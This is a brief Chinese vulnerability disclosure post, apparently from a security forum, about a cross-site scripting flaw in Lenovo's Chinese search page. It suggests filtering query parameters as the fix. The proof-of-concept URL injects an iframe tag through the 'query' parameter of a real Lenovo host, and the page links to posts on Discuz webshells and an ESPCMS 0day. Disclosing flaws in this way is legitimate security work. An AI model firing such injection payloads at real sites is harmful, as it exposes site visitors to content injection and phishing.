联想搜索跨站漏洞及修复

作者：hack1990 时间：11-01-19 阅读数：488人阅读

修复：对查询的参数做过滤处理。。。

漏洞证明：

http://search.lenovo.com.cn/lenovo/searchMain.jsp?%20moreHitsFromSite=&category=&similarTo=&similarType=find&breadcrumb=&old_query=&keywords=&sortBy1

=&findInResult=&filter=&sortOrder1=&sortOrder2=&collapseField=&scopeSearchField=&queryLanguage=

zh&numHits=10&offset=0&query=<iframe%20src=http://www.wooyun.org%20height=500></iframe>

上一篇：Discuz最新后台拿WEBSHELL

下一篇：ESPCMS 0day漏洞分析及官方修复方法

相关文章

发表评论